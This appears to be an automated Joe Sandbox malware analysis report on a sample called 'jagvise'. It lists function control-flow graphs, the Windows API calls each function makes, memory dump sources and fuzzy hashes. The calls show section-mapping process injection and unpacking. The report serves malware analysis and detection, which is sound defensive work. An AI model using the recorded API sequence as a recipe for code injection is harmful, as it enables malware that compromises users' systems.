                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 247 401666-401668 248 40166b 247->248 249 40164f-401676 247->249 250 40166c-40168c call 4012c3 248->250 249->250 257 401691-401696 250->257 258 40168e 250->258 260 4019b4-4019bc 257->260 261 40169c-4016ad 257->261 258->257 260->257 266 4019c1-401a03 call 4012c3 260->266 264 4019b2 261->264 265 4016b3-4016dc 261->265 264->266 265->264 274 4016e2-4016f9 NtDuplicateObject 265->274 274->264 276 4016ff-401723 NtCreateSection 274->276 278 401725-401746 NtMapViewOfSection 276->278 279 40177f-4017a5 NtCreateSection 276->279 278->279 282 401748-401764 NtMapViewOfSection 278->282 279->264 280 4017ab-4017af 279->280 280->264 285 4017b5-4017d6 NtMapViewOfSection 280->285 282->279 283 401766-40177c 282->283 283->279 285->264 287 4017dc-4017f8 NtMapViewOfSection 285->287 287->264 290 4017fe call 401803 287->290
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1652636561-0
                                                                                                                                                                                  • Opcode ID: 6a5a12e5199d7872be29d194e1bd71eececbcf8f897f93194828f5f612321f2e
                                                                                                                                                                                  • Instruction ID: a6ff109548181b59d63890122cf59ee8a8e7851f5ea650de0760a669d67658a3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a5a12e5199d7872be29d194e1bd71eececbcf8f897f93194828f5f612321f2e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 895129B4900205BFEB208F91CC89FAF7BB8FF85B10F104569FA11AA2E5D6759941CB64
                                                                                                                                                                                  Function 00401647 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 292 401647-40168c call 4012c3 301 401691-401696 292->301 302 40168e 292->302 304 4019b4-4019bc 301->304 305 40169c-4016ad 301->305 302->301 304->301 310 4019c1-401a03 call 4012c3 304->310 308 4019b2 305->308 309 4016b3-4016dc 305->309 308->310 309->308 318 4016e2-4016f9 NtDuplicateObject 309->318 318->308 320 4016ff-401723 NtCreateSection 318->320 322 401725-401746 NtMapViewOfSection 320->322 323 40177f-4017a5 NtCreateSection 320->323 322->323 326 401748-401764 NtMapViewOfSection 322->326 323->308 324 4017ab-4017af 323->324 324->308 329 4017b5-4017d6 NtMapViewOfSection 324->329 326->323 327 401766-40177c 326->327 327->323 329->308 331 4017dc-4017f8 NtMapViewOfSection 329->331 331->308 334 4017fe call 401803 331->334
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: d8106e4bc7ca673257447c9282689d7b3e0364b5c7f46d4caad185d9f9525db9
                                                                                                                                                                                  • Instruction ID: 13265af8c753d5296a068bec70926f9e91cf6f155eb2a251ba93df0398a9b2e3
                                                                                                                                                                                  • Opcode Fuzzy Hash: d8106e4bc7ca673257447c9282689d7b3e0364b5c7f46d4caad185d9f9525db9
                                                                                                                                                                                  • Instruction Fuzzy Hash: F6513BB5900205BFEB208F91CC89FEF7BB8FF85B10F104119F911BA2A4D6759941CB64
                                                                                                                                                                                  Function 00401660 Relevance: 10.7, APIs: 7, Instructions: 169nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 336 401660 337 401652-40165d 336->337 338 401664-40168c call 4012c3 336->338 337->338 344 401691-401696 338->344 345 40168e 338->345 347 4019b4-4019bc 344->347 348 40169c-4016ad 344->348 345->344 347->344 353 4019c1-401a03 call 4012c3 347->353 351 4019b2 348->351 352 4016b3-4016dc 348->352 351->353 352->351 361 4016e2-4016f9 NtDuplicateObject 352->361 361->351 363 4016ff-401723 NtCreateSection 361->363 365 401725-401746 NtMapViewOfSection 363->365 366 40177f-4017a5 NtCreateSection 363->366 365->366 369 401748-401764 NtMapViewOfSection 365->369 366->351 367 4017ab-4017af 366->367 367->351 372 4017b5-4017d6 NtMapViewOfSection 367->372 369->366 370 401766-40177c 369->370 370->366 372->351 374 4017dc-4017f8 NtMapViewOfSection 372->374 374->351 377 4017fe call 401803 374->377
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: e599f6710e28ba0f3f5ec0135dce1092a84c4915237567347f01b0f8a4c4c763
                                                                                                                                                                                  • Instruction ID: 88dcf12b86acca9d5ca78fae7b39ee59537206c200d96b006889814fd57da8f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: e599f6710e28ba0f3f5ec0135dce1092a84c4915237567347f01b0f8a4c4c763
                                                                                                                                                                                  • Instruction Fuzzy Hash: 12512AB0900205BFEB208F91CC89FAF7BB8FF85B10F104129FA11BA2E5D6759941CB64
                                                                                                                                                                                  Function 00401663 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 379 401663-40168c call 4012c3 386 401691-401696 379->386 387 40168e 379->387 389 4019b4-4019bc 386->389 390 40169c-4016ad 386->390 387->386 389->386 395 4019c1-401a03 call 4012c3 389->395 393 4019b2 390->393 394 4016b3-4016dc 390->394 393->395 394->393 403 4016e2-4016f9 NtDuplicateObject 394->403 403->393 405 4016ff-401723 NtCreateSection 403->405 407 401725-401746 NtMapViewOfSection 405->407 408 40177f-4017a5 NtCreateSection 405->408 407->408 411 401748-401764 NtMapViewOfSection 407->411 408->393 409 4017ab-4017af 408->409 409->393 414 4017b5-4017d6 NtMapViewOfSection 409->414 411->408 412 401766-40177c 411->412 412->408 414->393 416 4017dc-4017f8 NtMapViewOfSection 414->416 416->393 419 4017fe call 401803 416->419
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: 2089da846d8ed52526ea3fb0d68e445529b89086c2a436fa3bc4dd68b40d8f3a
                                                                                                                                                                                  • Instruction ID: 9dfb7286379cb5b978975c8e53e5cfa9d010df6993f6f88681d8ce4a50fb4c8e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2089da846d8ed52526ea3fb0d68e445529b89086c2a436fa3bc4dd68b40d8f3a
                                                                                                                                                                                  • Instruction Fuzzy Hash: B851FAB5900249BFEB208F91CC89FAF7BB8FF85B10F104159FA11BA2A5D6749941CB64
                                                                                                                                                                                  Function 00401674 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 421 401674-40168c call 4012c3 427 401691-401696 421->427 428 40168e 421->428 430 4019b4-4019bc 427->430 431 40169c-4016ad 427->431 428->427 430->427 436 4019c1-401a03 call 4012c3 430->436 434 4019b2 431->434 435 4016b3-4016dc 431->435 434->436 435->434 444 4016e2-4016f9 NtDuplicateObject 435->444 444->434 446 4016ff-401723 NtCreateSection 444->446 448 401725-401746 NtMapViewOfSection 446->448 449 40177f-4017a5 NtCreateSection 446->449 448->449 452 401748-401764 NtMapViewOfSection 448->452 449->434 450 4017ab-4017af 449->450 450->434 455 4017b5-4017d6 NtMapViewOfSection 450->455 452->449 453 401766-40177c 452->453 453->449 455->434 457 4017dc-4017f8 NtMapViewOfSection 455->457 457->434 460 4017fe call 401803 457->460
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: a471128e30253767d8ecbe7c8b9264cbc2fc79b6f64fc0f7368e35c36875084d
                                                                                                                                                                                  • Instruction ID: 6663a8c5485dafdc0fbfaf601e2c04d3b227d1cbd70bcfd861ccef21e9851678
                                                                                                                                                                                  • Opcode Fuzzy Hash: a471128e30253767d8ecbe7c8b9264cbc2fc79b6f64fc0f7368e35c36875084d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D51FBB5900245BFEF208F91CC89FAF7BB8FF85710F104159FA11AA2A5D7749941CB64
                                                                                                                                                                                  Function 00401678 Relevance: 10.7, APIs: 7, Instructions: 158nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 462 401678-40168c 463 401691-401696 462->463 464 40168e 462->464 466 4019b4-4019bc 463->466 467 40169c-4016ad 463->467 464->463 466->463 472 4019c1-401a03 call 4012c3 466->472 470 4019b2 467->470 471 4016b3-4016dc 467->471 470->472 471->470 480 4016e2-4016f9 NtDuplicateObject 471->480 480->470 482 4016ff-401723 NtCreateSection 480->482 484 401725-401746 NtMapViewOfSection 482->484 485 40177f-4017a5 NtCreateSection 482->485 484->485 488 401748-401764 NtMapViewOfSection 484->488 485->470 486 4017ab-4017af 485->486 486->470 491 4017b5-4017d6 NtMapViewOfSection 486->491 488->485 489 401766-40177c 488->489 489->485 491->470 493 4017dc-4017f8 NtMapViewOfSection 491->493 493->470 496 4017fe call 401803 493->496
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: 76003727399a2eca9fb632657c9a9f2aa461299f309746c84de5a453a1a51f96
                                                                                                                                                                                  • Instruction ID: 9d3a6761103bbc6b33e3c6c256166adc831e96f911efc5f9f86a17cfce9c5065
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76003727399a2eca9fb632657c9a9f2aa461299f309746c84de5a453a1a51f96
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A5109B5900245BFEF208F91CC88FAB7BB8FF85B10F100159FA11AA2A5D7709945CB20
                                                                                                                                                                                  Function 0040310D Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 499 40310d-403131 500 403250-403255 499->500 501 403137-40314f 499->501 501->500 502 403155-403166 501->502 503 403168-403171 502->503 504 403176-403184 503->504 504->504 505 403186-40318d 504->505 506 4031af-4031b6 505->506 507 40318f-4031ae 505->507 508 4031d8-4031db 506->508 509 4031b8-4031d7 506->509 507->506 510 4031e4 508->510 511 4031dd-4031e0 508->511 509->508 510->503 513 4031e6-4031eb 510->513 511->510 512 4031e2 511->512 512->513 513->500 514 4031ed-4031f0 513->514 514->500 515 4031f2-40324d RtlCreateUserThread NtTerminateProcess 514->515 515->500
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1921587553-0
                                                                                                                                                                                  • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                                                                                  • Instruction ID: 2230f495bd44a537ec581f9501d496a478b2d408bf54a46c3e49a74e62ee8954
                                                                                                                                                                                  • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 14414732618E0C4FD768EE6CAC4966377D5E7A8311B1A43ABD809D7384EE30D95183C5
                                                                                                                                                                                  Function 0088003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 69 88003c-880047 70 880049 69->70 71 88004c-880263 call 880a3f call 880e0f call 880d90 VirtualAlloc 69->71 70->71 86 88028b-880292 71->86 87 880265-880289 call 880a69 71->87 89 8802a1-8802b0 86->89 91 8802ce-8803c2 VirtualProtect call 880cce call 880ce7 87->91 89->91 92 8802b2-8802cc 89->92 98 8803d1-8803e0 91->98 92->89 99 880439-8804b8 VirtualFree 98->99 100 8803e2-880437 call 880ce7 98->100 102 8804be-8804cd 99->102 103 8805f4-8805fe 99->103 100->98 105 8804d3-8804dd 102->105 106 88077f-880789 103->106 107 880604-88060d 103->107 105->103 109 8804e3-880505 105->109 110 88078b-8807a3 106->110 111 8807a6-8807b0 106->111 107->106 112 880613-880637 107->112 121 880517-880520 109->121 122 880507-880515 109->122 110->111 113 88086e-8808be LoadLibraryA 111->113 114 8807b6-8807cb 111->114 115 88063e-880648 112->115 120 8808c7-8808f9 113->120 118 8807d2-8807d5 114->118 115->106 116 88064e-88065a 115->116 116->106 119 880660-88066a 116->119 123 880824-880833 118->123 124 8807d7-8807e0 118->124 127 88067a-880689 119->127 129 8808fb-880901 120->129 130 880902-88091d 120->130 131 880526-880547 121->131 122->131 128 880839-88083c 123->128 125 8807e2 124->125 126 8807e4-880822 124->126 125->123 126->118 133 88068f-8806b2 127->133 134 880750-88077a 127->134 128->113 135 88083e-880847 128->135 129->130 132 88054d-880550 131->132 136 8805e0-8805ef 132->136 137 880556-88056b 132->137 138 8806ef-8806fc 133->138 139 8806b4-8806ed 133->139 134->115 140 880849 135->140 141 88084b-88086c 135->141 136->105 143 88056d 137->143 144 88056f-88057a 137->144 145 88074b 138->145 146 8806fe-880748 138->146 139->138 140->113 141->128 143->136 147 88059b-8805bb 144->147 148 88057c-880599 144->148 145->127 146->145 153 8805bd-8805db 147->153 148->153 153->132
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0088024D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983746430.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_880000_jagvise.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                  • Instruction ID: aac36b1d1735d88017c5ffbfa41392513043c77e30cf763340a148cb817e5263
                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D527974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E50DAB351DB30AE88DF15
                                                                                                                                                                                  Function 0041E020 Relevance: 4.6, APIs: 3, Instructions: 60librarymemoryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 498 41e020-41e15e GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(007FBE60), ref: 0041E0FC
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00428558), ref: 0041E139
                                                                                                                                                                                  • VirtualProtect.KERNELBASE(007FBCA4,007FBE5C,00000040,?), ref: 0041E159
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983541097.0000000000411000.00000020.00000001.01000000.00000005.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_411000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2099061454-0
                                                                                                                                                                                  • Opcode ID: ed7f28cc16d09a46b10d0c784fb67efb52c54919e2bb855e4695998bb0004b58
                                                                                                                                                                                  • Instruction ID: bf942d14af1efede7f09638b6f18058680337e7b272a95013794b0dd03a82697
                                                                                                                                                                                  • Opcode Fuzzy Hash: ed7f28cc16d09a46b10d0c784fb67efb52c54919e2bb855e4695998bb0004b58
                                                                                                                                                                                  • Instruction Fuzzy Hash: BF3123106293C0EAE311DB38FC447663BA2AB69744F44946CD2848B3B2DBFE0556C72E
                                                                                                                                                                                  Function 00A2B324 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 516 a2b324-a2b33d 517 a2b33f-a2b341 516->517 518 a2b343 517->518 519 a2b348-a2b354 CreateToolhelp32Snapshot 517->519 518->519 520 a2b356-a2b35c 519->520 521 a2b364-a2b371 Module32First 519->521 520->521 528 a2b35e-a2b362 520->528 522 a2b373-a2b374 call a2afe3 521->522 523 a2b37a-a2b382 521->523 526 a2b379 522->526 526->523 528->517 528->521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A2B34C
                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00A2B36C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983884104.0000000000A28000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A28000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_a28000_jagvise.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                  • Instruction ID: 205a4703d955dd5c691c45fe07ba487d5bc87796906f2dafacc82a030c77e24b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 99F0CD32600321ABD7207BBDA98CBAA73E8BF48321F100238E642998C0DB70E8054A61
                                                                                                                                                                                  Function 00880E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 529 880e0f-880e24 SetErrorMode * 2 530 880e2b-880e2c 529->530 531 880e26 529->531 531->530
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00880223,?,?), ref: 00880E19
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00880223,?,?), ref: 00880E1E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983746430.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_880000_jagvise.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                  • Instruction ID: f2f6d8dcacfc00e91535e2c3d4d44eba824c5639ec75f1ad12dbbdf9da4bc129
                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C770994047E5
                                                                                                                                                                                  Function 0041E160 Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 532 41e160-41e1ee LoadLibraryW
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(007FBE60,0041E686), ref: 0041E1E8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983541097.0000000000411000.00000020.00000001.01000000.00000005.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_411000_jagvise.jbxd
                                                                                                                                                                                  Similarity
